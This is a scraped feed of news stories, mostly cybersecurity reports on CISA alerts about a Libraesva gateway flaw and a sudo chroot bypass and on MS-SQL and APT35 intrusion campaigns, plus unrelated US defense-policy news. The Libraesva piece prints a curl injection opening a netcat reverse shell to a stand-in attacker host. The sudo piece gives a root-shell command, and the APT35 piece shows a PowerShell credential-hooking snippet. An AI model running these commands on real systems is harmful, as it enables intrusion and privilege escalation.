CISA Warns of Libraesva ESG Command Injection Vulnerability Actively Exploited in Attacks

·

cyber security, Cyber Security News, Threats

In late September 2025, the Cybersecurity and Infrastructure Security Agency (CISA) issued a public alert regarding the active exploitation of a critical command injection vulnerability tracked as CVE-2025-59689 in Libraesva Email Security Gateway (ESG) devices.

This flaw has rapidly emerged as a favored target for threat actors due to its ease of exploitation and the wide deployment of Libraesva ESG as a frontline defense in corporate and government email infrastructure.

The vulnerability allows unauthenticated attackers to execute arbitrary system commands on affected appliances, resulting in a significant risk of email compromise, data exfiltration, and lateral movement within networks.

Initial discovery of this security weakness surfaced after multiple security firms observed anomalous traffic directed at public-facing ESG appliances across Europe and North America.

Attackers quickly weaponized proof-of-concept exploits, taking advantage of the flaw’s simple payload delivery—typically through a crafted HTTP POST request to an exposed management interface.

Organizations relying on Libraesva ESG appliances for spam and phishing defense are directly at risk, with exploitation frequently resulting in full device takeover.

CISA analysts noted that attackers leveraging CVE-2025-59689 did so with high speed and stealth, leaving minimal traces in security logs.

Their investigations revealed that successful exploitation permitted payloads enabling remote shell access, installation of additional malware packages, and use of the ESG appliance as a pivot point for internal reconnaissance.

Notably, CISA documented several incidents where attackers deployed reverse shells to establish persistent access channels post-compromise.

The infection mechanism at the heart of CVE-2025-59689 is a classic OS command injection. An attacker submits a specially crafted request to the web-based management API with command payloads embedded in user-supplied parameters.

For example:-

curl - X POST "https://target-esg/management/api[.]php" - d '[cmd]=;nc - e /bin/bash attacker[.]com 4444'

This command illustrates how the flaw enables an external actor to spawn a remote shell directly to the attacker’s system, bypassing authentication controls.

CISA researchers found that many incidents occurred due to ESG appliances lacking recent security updates, underscoring the necessity for timely patching.

Libraesva ESG Exploit Flow begins with external payload delivery and culminating in command execution and attacker control.

The continued exploitation of CVE-2025-59689 reinforces the importance of robust patch management and vigilant monitoring of security infrastructure for signs of compromise.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post CISA Warns of Libraesva ESG Command Injection Vulnerability Actively Exploited in Attacks appeared first on Cyber Security News.

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
Threat Actors Hijacking MS-SQL Server to Deploy XiebroC2 Framework

·

cyber security, Cyber Security News, Threats

A sophisticated attack campaign targeting improperly managed Microsoft SQL servers has emerged, deploying the XiebroC2 command and control framework to establish persistent access to compromised systems.

The attack leverages vulnerable credentials on publicly accessible database servers, allowing threat actors to gain initial foothold and escalate privileges through a multi-stage deployment process.

XiebroC2, a publicly available C2 framework similar to CobaltStrike, provides attackers with comprehensive remote control capabilities including information gathering, defense evasion, and system manipulation.

The campaign follows a predictable pattern observed in MS-SQL server attacks, beginning with credential-based intrusions and progressing to coin mining operations.

However, the integration of XiebroC2 represents a significant escalation in attack sophistication, as the framework supports cross-platform operations across Windows, Linux, and macOS environments.

The framework’s open-source nature and extensive feature set make it an attractive alternative to commercial penetration testing tools, offering attackers capabilities such as reverse shells, file management, process control, and network monitoring without the associated costs.

ASEC analysts identified the malware during routine monitoring of attacks targeting MS-SQL servers, confirming the deployment of XiebroC2 alongside traditional coin mining payloads.

The framework’s implant component, written in Go programming language, demonstrates advanced techniques for evading detection while maintaining persistent communication with command and control infrastructure.

XiebroC2’s GitHub page (Source – ASEC)

The attack methodology highlights the ongoing vulnerability of database servers that lack proper security hardening and access controls.

Privilege Escalation Through JuicyPotato Exploitation

The attack chain demonstrates a methodical approach to privilege escalation through the deployment of JuicyPotato, a well-documented exploit tool that abuses Windows token privileges.

Following successful authentication to the target MS-SQL server, attackers encounter the inherent limitation of service account privileges, which typically operate with restricted access rights by design.

To overcome this constraint, the threat actors utilize JuicyPotato to exploit specific token privileges within the currently running process account, effectively elevating their access from service-level to administrative permissions.

The privilege escalation technique capitalizes on the impersonation privileges often granted to service accounts, allowing the exploit to abuse these permissions and spawn processes with elevated rights.

Once JuicyPotato successfully escalates privileges, attackers proceed to download and execute the XiebroC2 framework using PowerShell commands.

This approach ensures that subsequent malicious activities operate with sufficient privileges to modify system configurations, install additional payloads, and establish persistent backdoors.

MS-SQL service downloading XiebroC2 (Source – ASEC)

The configuration data reveals the framework’s ability to collect comprehensive system information including process identifiers, hardware identifiers, working directories, and user credentials before establishing encrypted communication channels with the command and control server located at IP address 1.94.185.235 on port 8433.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post Threat Actors Hijacking MS-SQL Server to Deploy XiebroC2 Framework appeared first on Cyber Security News.

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
$50 Battering RAM Attack Breaks Intel and AMD Cloud Security Protections

·

A group of academics from KU Leuven and the University of Birmingham has demonstrated a new vulnerability called Battering RAM to bypass the latest defenses on Intel and AMD cloud processors. “We built a simple, $50 interposer that sits quietly in the memory path, behaving transparently during startup and passing all trust checks,” researchers Jesse De Meulemeester, David Oswald, Ingrid

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
APT35 Hackers Attacking Government, Military Organizations to Steal Login Credentials

·

cyber security, Cyber Security News, Threats
In recent months, a surge in targeted intrusions attributed to the Iranian-aligned threat group APT35 has set off alarm bells across government and military networks worldwide.

First detected in early 2025, the campaign leverages custom-built malware to infiltrate secure perimeters and harvest user credentials.

Initial indicators of compromise point to spear-phishing emails with HTML attachments that deploy a multi-stage payload once opened, silently establishing a foothold in the target environment.

Analysis of the attack chain reveals that the initial vector often involves weaponized Microsoft Office documents exploiting CVE-2023-23397 to bypass Outlook’s security model.

The embedded code downloads a PowerShell stager, which then fetches the primary credential-stealer module from a remote command-and-control (C2) server.

Stromshield researchers identified this behavior during a compromise of a defense ministry network in April, noting the seamless transition from document exploit to stealthy reconnaissance and credential exfiltration.

Once deployed, the malware masquerades as legitimate system processes to evade detection. It hooks into the Windows Security Support Provider Interface (SSPI) to intercept NTLM challenge-response exchanges, capturing hashed credentials in memory.

These hashes are then relayed to the attacker’s infrastructure, where a combination of hash-cracking and pass-the-hash techniques unlock privileged accounts on high-value servers.

The impact has been significant: multiple accounts within military communications networks were compromised without triggering conventional intrusion detection systems.

In one documented case, the stager code resembles the following snippet, illustrating how the malware invokes SSPI hooks in PowerShell:-
```
$sspi = Add-Type -MemberDefinition @"
    [DllImport("secur32.dll", CharSet=CharSet.Auto)]
    public static extern int LsaLogonUser(
        IntPtr LsaHandle, string OriginName, uint LogonType,
        uint LogonPackage, IntPtr AuthenticationInfo,
        uint AuthenticationInfoLength, IntPtr LocalGroups,
        IntPtr SourceContext, out IntPtr ProfileBuffer,
        out uint ProfileBufferLength, out uint LogonId,
        out IntPtr Token, out uint Quotas, out uint SubStatus);
"@ -Name "Lsa" -Namespace "WinAPI" -PassThru
```
Infection Mechanism

The infection mechanism hinges on a two-stage downloader that first discerns the victim’s environment.

Upon successful document exploit, the initial stager performs environment checks—querying registry keys for security tools and scanning loaded kernel modules.

If a recognized analysis sandbox is detected, execution halts to thwart reverse-engineering efforts. Otherwise, the stager decodes a base64-encoded second-stage payload, writing it to %AppData%\Roaming\msnetcache.dll before loading it via rundll32.exe.

Screenshot from viliam.ude-final[.]online (Source – Stormshield)

This DLL implements the SSPI hook logic, intercepts credentials, and then performs HTTP GET requests to the C2 domain over port 443, blending traffic with legitimate HTTPS sessions.

Overall, the campaign reflects APT35’s growing sophistication in embedding deep within trusted processes and leveraging native APIs to capture credentials without dropping overt artifacts.

Continued vigilance and advanced behavioral monitoring are crucial to detect such stealthy intrusions before critical access is compromised.

Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.

The post APT35 Hackers Attacking Government, Military Organizations to Steal Login Credentials appeared first on Cyber Security News.
¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
SecDef uses unprecedented meeting to unveil 10 personnel, due-process reviews

·

Policy
Defense Secretary Pete Hegseth summoned hundreds of admirals, generals, and senior enlisted leaders to Quantico, Virginia, on Tuesday to hear him announce a spate of personnel initiatives around physical fitness and grooming standards, the inspector general process, and mandatory training.

Some of the 10 initiatives flow from reviews Hegseth has ordered since taking the job in January, including gender-neutral fitness standards for combat jobs and exemptions to facial hair rules. Others take aim at processes that affect or have affected the secretary himself.

“I don't want my son serving alongside troops who are out of shape, or in a combat unit with females who can't meet the same combat arms physical standards as men, or troops who are not fully proficient on their assigned weapons platform or task, or under a leader who is the first, but not the best,” he told the assembled flag officers and their enlisted advisors, who were ordered to Marine Corps Base Quantico on short notice from commands around the world.

Hegseth’s speech functioned as a sort of State of the Union for his culture war at the Pentagon, making baseless claims that fitness standards have dropped to accommodate the integration of women, or that the first women or people of color to hold high-ranking positions were chosen for that reason alone.

He called for a review of the inspector general process, including the Equal Opportunity and Military Equal Opportunity complaint processes, which enable troops to anonymously report concerns without fear of retaliation.

“We are overhauling an inspector general process, the IG, that has been weaponized, putting complainers, ideologues, and poor performers in the driver's seat,” he said.

Hegseth is under investigation by the department’s inspector general for allegedly using an unsecure, unapproved app to conduct official business in the form of sending strike plans over Signal.

He also called for a review of the rules governing the retention of “adverse information”—for example, documented misconduct—on personnel records, which can hamstring a service member’s assignment or promotion chances.

“People make honest mistakes, and our mistakes should not define an entire career,” he said.

Hegseth has said he resigned from the D.C. National Guard in 2021 after his superiors concluded that his tattoos were associated with white supremacist ideology and barred him from serving at Biden inaugural events.

Here are the initiatives Hegseth announced Tuesday:
- All combat arms positions will use the “highest male standard” as their physical fitness requirement.
- All combat arms units will implement a separate “combat field test.”
- All service members will take part in physical fitness every duty day, whether as a unit or individually.
- All service members must complete a height-weight assessment and physical fitness test twice yearly. (This is already policy.)
- Beards are banned, except for temporary waivers for pseudofolliculitis barbae. Religious exemptions, such as those for Norse Pagans or Sikhs, are rescinded.
- The department will review its definitions of “toxic leadership,” hazing, and bullying.
- A department-wide review of fitness standards.
- A review of the IG, EO, and MEO processes.
- Unspecified changes to retention of adverse information in personnel files.
- Reduction of mandatory training requirements.
“I look out at this group, and I see great Americans, leaders who have given decades to our great Republic, at great sacrifice to yourselves and to your families,” Hegseth said, addressing the assembled senior leaders. “But if the words today are making your heart sink, then you should do the honorable thing and resign.”

Some of Hegseth’s comments on physical fitness standards, including repeatedly referring to “fat” service members, reinforce policies that already exist but may be unevenly enforced. As an example, members of the military regularly question whether four-star generals and admirals are truly completing their fitness assessments.

“Frankly, it's tiring to look out at combat formations, or really, any formation, and see fat troops,” the secretary said. “Likewise, it's completely unacceptable to see fat generals and admirals in the halls of the Pentagon and leading commands around the country and the world. It's a bad look.”

Other comments were flat-out fabrications, such as his assertion that in 2015, “combat arms standards were changed to ensure females could qualify.”

No service has lowered its fitness standards to accommodate women. In one case, the Army created an entirely new battery – the Occupational Physical Assessment Test – with gender-neutral scoring to determine which types of jobs new recruits are qualified to do. The service then spent years revamping its fitness test, adding events that test strength, power and agility in addition to muscular endurance.

Hegseth’s review requires a justification for any standards put in place after 1990, suggesting that he prefers a default to that era’s gender- and age-determined scoring of pushups, situps and a run.

Throughout the secretary’s many public comments alleging lowered fitness standards, he has not specified an instance where it happened.

Hegseth also called on the assembled leaders to be honest about the state of the force.

“We have to say with our mouths what we see with our eyes, just tell it like it is in plain English to point out the obvious things right in front of us,” he said. “That's what leaders must do.”

That comment came just a month after Hegseth fired Air Force Lt. Gen. Jeffrey Kruse, the director of the Defense Intelligence Agency, whose initial assessments of the bombing of Iran nuclear sites determined that the raid had set back the country’s nuclear ambitions by months, rather than the “obliteration” the administration touted.

The department dropped another memo Tuesday, which Hegseth did not mention in his speech, directing a “cultural refresh” among the civilian workforce, “to address two complementary but distinct objectives: encourage workforce rewards and demystify the removal process.”

More than 60,000 civilians voluntarily left DOD this year either through the Deferred Resignation Program or Voluntary Early Retirement Authority, in addition to hundreds of probationary employees the Pentagon attempted to lay off and then invited back under a judge’s order.

Hegseth previewed another speech next month, saying he’ll “showcase the speed, innovation and generational acquisition reforms we are undertaking urgently,” and “the nature of the threats we face in our hemisphere and in deterring China.”
]]>
¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
How SOC Teams Detect Can Detect Cyber Threats Quickly Using Threat Intelligence Feeds

·

cyber security, Cyber Security News, CyberPedia
Security Operations Centers (SOCs) protect organizations’ digital assets from ongoing cyber threats. To assess their effectiveness, SOCs use key performance indicators (KPIs) such as Mean Time to Detect (MTTD) and False Positive Rate (FPR).

Although these metrics are often seen as separate, they are closely interconnected; improving one can directly enhance the other.

By integrating high-fidelity threat intelligence (TI) feeds, SOC teams can significantly lower their MTTD, which in turn helps to drastically reduce the number of false positives that plague their daily operations.

A false positive occurs when a security tool mistakenly flags harmless activity as malicious. A high FPR is one of the most significant challenges facing modern SOCs. It leads to several detrimental outcomes:
- Alert Fatigue: Analysts become overwhelmed by a constant stream of irrelevant alerts, leading to burnout and desensitization. This environment makes it more likely that a genuine threat will be overlooked.
- Wasted Resources: Every false positive requires investigation time from a security analyst, typically at the Tier 1 level. These cycles are costly and divert attention from legitimate threats and proactive threat-hunting activities.
- Reduced Trust in Security Tools: When a particular security system generates too much noise, analysts may begin to distrust its alerts, lowering their overall confidence in the organization’s security posture.
How Threat Intelligence Feeds Reduce MTTD

Mean Time to Detect measures the average time it takes for the SOC to become aware of a security incident. A lower MTTD is crucial because it shortens the window an attacker has to operate within the network.

Enhance Your SOC Operations With Fresh and Real-Time IoCs With near-zero false positives => Free Trial

Threat intelligence feeds are real-time streams of Indicators of Compromise (IOCs) such as malicious IP addresses, domains, URLs, and file hashes that are directly integrated into security tools like SIEM, SOAR, and EDR platforms.

This integration enables the automated, real-time correlation of internal network and endpoint data with a global repository of known threats. When a match occurs, an alert is generated with a high degree of confidence.

This process reduces detection time from hours or days of manual investigation to mere seconds.The strategy of using TI feeds to lower MTTD directly contributes to a reduced false positive rate through several mechanisms. The key lies in the quality and context of the intelligence provided.

High-quality TI feeds are curated from verified sources, such as interactive sandbox analysis of real-world malware samples. This means the IOCs within the feed have already been vetted and are confirmed to be malicious.

When a security tool generates an alert based on a match from a high-fidelity feed, it is, by definition, a true positive. This validation process effectively filters out the noise of ambiguous or low-confidence alerts that would otherwise require manual triage.

Modern TI feeds do more than just provide a list of IOCs. They enrich alerts with critical context that helps analysts immediately understand the nature and severity of the threat. This context includes:
- Threat Categorization: The alert is labeled with the associated malware family (e.g., Dridex, Emotet) or threat actor group.
- Severity Score: A numerical score indicates the risk level of the IOC, allowing for automated prioritization.
- Timestamps: Information on when the IOC was first and last seen helps determine if the threat is part of an active campaign.
- Related Artifacts: Links to associated file hashes, domains, or URLs provide a more complete picture of the attack infrastructure.
This contextual data transforms a generic alert like “Suspicious connection to IP 1.2.3.4” into a high-confidence, actionable insight: “Critical Alert: Outbound C2 communication to 1.2.3.4, confirmed part of active LockBit 3.0 ransomware infrastructure.” This removes ambiguity and confirms the alert’s legitimacy, preventing it from being dismissed as a false positive.

With the immediate validation and context provided by TI feeds, SOCs can automate the initial triage process. Using SOAR (Security Orchestration, Automation, and Response) playbooks, alerts enriched by high-confidence threat intelligence can trigger automated actions.

For example, a confirmed malicious IP can be automatically added to a firewall blocklist, and the affected endpoint can be isolated from the network.

This not only reduces the Mean Time to Respond (MTTR) but also ensures that analyst time is reserved for complex incidents that require human ingenuity rather than validating known threats.

Threat intelligence feeds also empower Tier 2 and Tier 3 analysts to conduct more effective proactive threat hunting. By providing IOCs and Tactics, Techniques, and Procedures (TTPs) associated with emerging campaigns, feeds allow hunters to build hypotheses and search for threats before they trigger automated alerts.

For instance, if a feed highlights a new TTP used by a specific threat actor, hunters can search their environment for evidence of that behavior.

This proactive posture uncovers stealthy threats that might otherwise go undetected and further validates the intelligence being used, reinforcing the cycle of high-confidence detections.

Enhance Your SOC Operations With Fresh and Real-Time IoCs With near-zero false positives => Free Trial

The post How SOC Teams Detect Can Detect Cyber Threats Quickly Using Threat Intelligence Feeds appeared first on Cyber Security News.
¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
Shutdown would curtail long-term intelligence work at DOD

·

Threats

The nation’s top spy offices are expected to pare certain "non-essential" intelligence-gathering activities if the government shuts down at midnight tonight.

Under guidance provided by the Defense Department, intelligence work that directly supports active military operations, threat monitoring, or other national-security emergencies is designated “excepted” and would continue if funding lapses.

But agencies would be required to pause certain longer-term activities. Those include political and economic analysis work unrelated to current crises and intelligence support for weapons acquisition.

Political and economic assessments can help military planners understand how foreign governments and global financial conditions shape conflicts, while weapons-acquisition intelligence helps the U.S. design, purchase, and test systems.

In essence, tactical intelligence collection activities would remain active, though much of the strategic analysis that supports future planning of the DOD’s spying activities would be curtailed until federal funding is restored.

“Command, control, communications, computer, intelligence, surveillance and reconnaissance activities” remain excepted functions, the document says. That also includes the use of spying capabilities tied to telecommunications infrastructure, which are often used by the National Security Agency to intercept phone calls and other communications as they cross the world’s internet backbone.

Offices like the National Geospatial-Intelligence Agency, which relies on satellites and imagery analysis to track targets from space, can also continue their core intelligence missions. Other major DOD spying offices include the Defense Intelligence Agency and the National Reconnaissance Office, the latter of which designs and launches the nation’s spy satellites.

The exemptions would also apply to a slew of other intelligence units housed inside military branches like the Army, Air Force and Navy.

Other intelligence offices like the CIA are not housed directly in DOD but coordinate closely with the military on spying matters. Less public information is available on shutdown plans for the CIA and the Office of the Director of National Intelligence, which oversees the nation’s 18 spy agencies.
]]>

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
Phantom Taurus: New China-Linked Hacker Group Hits Governments With Stealth Malware

·

Government and telecommunications organizations across Africa, the Middle East, and Asia have emerged as the target of a previously undocumented China-aligned nation-state actor dubbed Phantom Taurus over the past two-and-a-half years. “Phantom Taurus’ main focus areas include ministries of foreign affairs, embassies, geopolitical events, and military operations,” Palo Alto Networks Unit 42

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶
The D Brief: Hegseth, Trump at Quantico; Shutdown watch; Defense-strategy concerns; Troops-in-streets update; And a bit more.

·

Threats
Grooming standards, “toxic leadership,” and culture wars were the themes Defense Secretary Pete Hegseth chose for his unprecedented short-notice gathering of more than 800 military leaders and their senior enlisted advisors from commands around the world to a Marine base in Virginia Tuesday morning.

Shortly before Hegseth spoke, President Donald Trump told reporters the generals and admirals had come to hear “how well we’re doing militarily.” But Hegseth spent most of his time repeating many of the gripes heard during Trump’s presidential campaign.

“No more dudes in dresses. No more climate change worship,” Hegseth said in his Tuesday address. “We are done with that shit,” he insisted. “For too long we've promoted too many uniformed leaders for the wrong reasons—based on their race, gender quotas, based on historic so-called ‘firsts,’” said Hegseth, who has fired black and women leaders while offering no evidence that they were inappropriately appointed or had performed poorly.

Here are a few other lines from Hegseth’s speech to the highest-ranking members of the U.S. military:
- On names: “Welcome to the War Department. Because the era of the Department of Defense is over.”
- On accountability: “We are overhauling an inspector general process that has been weaponized, putting complainers and poor performers in the driver seat. We are doing the same with the equal opportunity policies. No more frivolous complaints, no more anonymous complaints,” he said, which would seem to protect domestic abusers in the Pentagon’s ranks.
- More on accountability: “You should not pay for an earnest mistake for your entire career. That's why today, at my direction, we're making changes to the retention of adverse information on personnel records.” He also said he’s ordered a review of “the department’s definitions of so-called toxic leadership, bullying and hazing to empower leaders to enforce standards without fear of retribution or second guessing.”
- On fitness: “I don't want my son serving alongside troops who are out of shape or in combat units with females who can't meet the same combat arms physical standards as men.”
- More on fitness: “Frankly, it's tiring to look out at combat formations and see fat troops. Likewise, it's completely unacceptable to see fat generals and admirals.”
- On beards: “The era of unprofessional appearance is over. No more beardos…if you don't meet the male-level physical standards for combat positions, cannot pass a PT test or don't want to shave and look professional, it's time for a new position.”
- On drill sergeants: “We're empowering drill sergeants to instill healthy fear in new recruits, ensuring that future warfighters are forged…they can put hands on recruits.”
- On ethics in conflict: “We untie the hands of our warfighters to intimidate, demoralize, hunt, and kill the enemies of our country. No more politically correct and overbearing rules of engagement.”
- On Hegseth’s view of the military: “You kill people and break things for a living. You are not politically correct.”
President Trump took the podium after Hegseth, and told the crowd, “I've never walked into a room so silent before. Just have a good time. And if you want to applaud, you applaud.”

He added: “If you don't like what I'm saying, you can leave the room. Of course, there goes your rank. There goes your future. But you just feel nice and loose,” the president told his captive audience.

Trump then launched into a speech that wandered among some of his favorite recent topics, including his desire for the Nobel Peace Prize; the Gulf of Mexico; how Democrats are “a lot of bad people”; how “everyone loves my signature”; how he thinks he’s ended eight wars; his desire to make Canada the 51st state; how he believes the U.S. Navy uses “ugly ships” and “I think we should maybe start thinking about battleships”; that he thinks the U.S. is being invaded “from within”; his stated belief that Washington, D.C., is more dangerous than Afghanistan; how he’s ordered U.S. troops to occupy American cities and how that’s “gonna be a major part for some people in this room”; and relatedly, how he thinks “we should use some of these dangerous [U.S.] cities as training grounds for our military.”

One lingering question: Was this in-person meeting necessary? After all, “The military is well-equipped to hold meetings online in a secure fashion,” former Justice Department attorney for the Northern District of Alabama. Joyce Vance wrote Monday evening.

Reaction from Capitol Hill:
- “He billed the taxpayers millions to fly every general to Washington to hear this weirdo drivel,” said Sen. Chris Murphy, D-Conn., writing on social media Tuesday. (One recent estimate put the costs somewhere between three and six million dollars.) Also, “He's telling us what he's doing. Using the military to suppress protest,” Murphy added.
- “We need a Defense Secretary focused on fighting real wars instead of culture wars,” said Delaware Democratic Sen. Chris Coons.
- “America’s military leadership has more important things to do than listen to lectures on character from an unqualified drunk who assaults women,” said Virginia Democratic Rep. Don Beyer. “Any soldier who was as careless as Hegseth was with war plans would be fired if not prosecuted. And everyone in that room knows it.”
Commentary from a retired Air Force one-star: “Defense Secretary Pete Hegseth’s short-notice, no-explanation summoning of more than 800 general and flag officers from command positions around the world demonstrates a lack of respect for their time and their jobs. It suggests a concomitant lack of respect for their advice”—and that endangers “the civilian-military dialogue, the military itself, and the country.” Read Paula Thornhill’s argument, here.

One last note: Trump and Hegseth’s forthcoming national defense strategy has raised “serious concerns” among top Pentagon officers, including the chairman of the Joint Chiefs of Staff, Gen. Dan Caine, the Washington Post reported Monday evening.

In particular, Trump and Hegseth’s focus “on perceived threats to the homeland, narrowing U.S. competition with China, and downplaying America’s role in Europe and Africa” have fostered a “growing sense of frustration with a plan they consider myopic and potentially irrelevant, given the president’s highly personal and sometimes contradictory approach to foreign policy,” four Post reporters write. Read more (gift link), here.

Additional reading:
- “AUKUS survives Pentagon review, with US submarine sales to proceed,” Nikkei Asia reported Tuesday;
- “Marines say they hit recruiting goals and point to 'unapologetic' standards,” the Associated Press reported Monday;
- “US revokes visa for Colombia's president after he urges American soldiers to disobey Trump,” AP reported Saturday
- Commentary: “Military AI needs guardrails not to slow it down, but to keep it useful,” Mieke Eoyang wrote Monday for Defense One;
- And ICYMI, “George Hardy, last of the Tuskegee Airmen's World War II combat pilots, dies at 100,” NBC News reported Friday.
Welcome to this Tuesday edition of The D Brief, a newsletter dedicated to developments affecting the future of U.S. national security, brought to you by Ben Watson and Bradley Peniston. It’s more important than ever to stay informed, so thank you for reading. Share your tips and feedback here. And if you’re not already subscribed, you can do that here. On this day in 1954, the USS Nautilus submarine was commissioned as the world's first nuclear-powered vessel.

Shutdown watch

Read the Defense Department’s shutdown guidance, here. TLDR: Just over 400,000 of DOD’s 741,477 civilian employees will be kept on the job, either because they are “[n]ecessary to protect life and property” or because their salaries are not funded through regular appropriations acts.

Noted: DOD officials had been unable to provide the current number of DOD civilians when asked about it last week; they declined to provide details about Hegseth’s ongoing efforts to cut the workforce.

Latest: “All signs point to the government shutting down at midnight Tuesday night,” Politico posted at 8 a.m. on Tuesday. “Just when Monday’s meeting between President Donald Trump and congressional leaders brought a glimmer of a potential offramp—the president expressed openness to extending Obamacare credits, Democrats’ asking price—it was back to the status quo hours later.

“Trump posted a deepfake video Monday night of Senate Minority Leader Chuck Schumer talking about why voters hate Democrats and House Minority Leader Hakeem Jeffries in a sombrero and mustache, which Jeffries called bigoted. Now, just 16 hours until the deadline, there’s no reason to expect a breakthrough. And leaders haven’t set a follow-up meeting on the impasse.” Read on, here.

Charted: Congress’ struggle to fund the government, in concise yet detailed graphs and text, from the New York Times, here.

Related reading: “Shutdown could erode cyber defenses by sidelining critical staff, experts warn,” Nextgov reported Monday.

Workforce cuts to take effect today: “This week marks the largest single-year exodus of federal US employees in almost 80 years,” Reuters writes. That’s because the delayed resignations of more than 100,000 federal workers, part of the Trump administration’s effort to shrink the federal workforce, take effect tonight.

DOD workers account for the lion’s share of workers taking buyouts or early retirement: more than 61,000, officials told Defense One’s Meghann Myers last week.

Historian’s take: “This year’s cuts to the government workforce will mean the loss of at least 275,000 workers, the largest decline in civilian federal employment in a single year since World War II,” Boston College’s Heather Cox Richardson wrote Monday.

Related reading:
- “Trump administration moves to defund inspector general watchdog group,” the Washington Post reported Tuesday regarding the Council of the Inspectors General on Integrity and Efficiency, which is the umbrella organization for 72 inspectors general across government;
- And “Judge Reinstates Over 500 Voice of America Journalists and Staff,” in a scathing reversal of their firing by the Trump administration, the New York Times reported Monday.
Troops in U.S. streets

As armed, masked agents patrol downtown Chicago, Illinois governor says National Guard troops could be next. AP: “Trump has waffled on sending the military, but Democratic Gov. JB Pritzker said Monday it appeared the federal government would deploy 100 troops. Pritzker said the Illinois National Guard received word that the Department of Homeland Security sent a memo to the Defense Department requesting troops to protect ICE personnel and facilities.”

AP’s article also offers “a snapshot of where things stand with federal law enforcement activity in Chicago, Portland, Memphis and New Orleans.” Read more, here.

Louisiana’s Gov. Jeff Landry: “Tonight, we're sending the Department of War a request to send the National Guard, asking them to deploy the National Guard here in Louisiana into our cities like New Orleans and Baton Rouge and others,” the Republican governor said Monday night on Fox TV.

Reminder: Landry does not need authorization to activate his own National Guard. He’s in charge of the force.

In Oregon: A judge set a Friday hearing for the state’s argument to block Trump’s deployment of National Guard troops, the Oregon Capital Chronicle reported Monday. In the meantime, Sen. Ron Wyden, D-Ore., “who has led the push to force the Treasury to turn over Epstein-related Treasury records of at least $1.5 billion in suspicious transactions to Senate investigators—posted a video of the ICE facility Trump claims is under siege. There were no people there at all,” Richardson wrote.

Background:
- “Portland threatens to evict ICE from Oregon facility over permit violations,” The Guardian reported Sept. 26.
- “ICE and federal riot police bombarded a Portland neighborhood with so many chemical munitions it forced a public school to flee,” Rolling Stone reported on Aug. 22.
Around the world

Trump secured Netanyahu’s agreement to a Gaza plan that would make the U.S. president the temporary chairman of a board in charge of the redevelopment of the seaside Palestinian territory, the New York Times reported off the leaders’ Monday meeting.

However, it’s far from clear that Hamas will agree to the plan, although Trump said he would back further Israeli war in Gaza if the group declines. More, here.

The far-right digital network Black Sun Rising Militia planned to paralyze Europe in a coordinated attack on synagogues, mosques and several Swedish media houses last year, reports SVT Nyheter, the news arm of Swedish public television, after the conviction in Brazil of the network’s leader, a 35-year-old American who had been recruiting people in the Nordic countries on social media. A bit more, here.

Lastly today: “FBI boss Kash Patel gave New Zealand officials 3D-printed guns illegal to possess under local laws,” AP reported on Tuesday, during his July visit to the country. More on that situation, and the diplomatic discomfort caused by Patel’s remarks on China, here.
]]>
¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

¶¶¶¶¶

CISA Warns of Linux Sudo Vulnerability Actively Exploited in Attacks

cyber security, Cyber Security News, vulnerability, Vulnerability News

CISA has issued an urgent advisory regarding a critical vulnerability in the Linux and Unix sudo utility CVE-2025-32463 that is currently being exploited in the wild.

This flaw allows local adversaries to bypass access controls and execute arbitrary commands as the root user, even without explicit sudoers privileges.

Sudo Chroot Bypass (CVE-2025-32463)

Identified as “Inclusion of Functionality from Untrusted Control Sphere,” CVE-2025-32463 stems from improper validation in the handling of the -R (–chroot) option.

When invoked, sudo -R /path/to/chroot command, the utility fails to verify that the target directory is secure. Attackers can craft a malicious chroot environment under their control, often in a directory they own, to trick sudo into executing code with elevated privileges.

This control sphere attack vector is catalogued under Related CWE: CWE-829 (Inclusion of Functionality from Untrusted Control Sphere).

Exploit scenarios include a local user creating a directory with manipulated symbolic links and configuration files.

Running sudo -R attacker_dir /bin/sh to spawn a root shell regardless of sudoers restrictions and potential integration into post-exploitation toolkits, enabling full system takeover.

While there are no confirmed reports of integration in known ransomware campaigns to date, the severity of an unprivileged local user gaining root access cannot be overstated.

CISA has designated the vulnerability remediation Due Date of 2025-10-20. Systems left unpatched risk complete compromise of confidentiality, integrity, and availability.

Risk Factors	Details
Affected Products	Sudo versions prior to 1.9.14p2 on Linux/Unix
Impact	Local privilege escalation—attacker gains root shell
Exploit Prerequisites	Ability to create a malicious chroot directory
CVSS 3.1 Score	9.3 (Critical)

Mitigations

Organizations running any version of sudo shipping prior to patched releases must act immediately:

Update to the latest sudo release as detailed in the Sudo project advisory.
If patches cannot be deployed, disable the -R option by adding Defaults !use_chroot in /etc/sudoers.
For cloud and managed services, follow binding operational directives to ensure secure configuration baselines.
Scan systems for unusual chroot usage patterns and review logs for sudo invocations that reference untrusted directories.

CISA’s alert highlights the importance of vigilant patch management and ongoing monitoring. Administrators should verify compliance with vendor instructions or discontinue vulnerable implementations where mitigations are unavailable.

Failure to address this vulnerability by the 2025-10-20 deadline may result in unauthorized root access, data breaches, or system-wide compromise.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

The post CISA Warns of Linux Sudo Vulnerability Actively Exploited in Attacks appeared first on Cyber Security News.

¶¶¶¶¶

Privilege Escalation Through JuicyPotato Exploitation

Infection Mechanism

How Threat Intelligence Feeds Reduce MTTD

Shutdown watch

Troops in U.S. streets

Around the world

Sudo Chroot Bypass (CVE-2025-32463)

Mitigations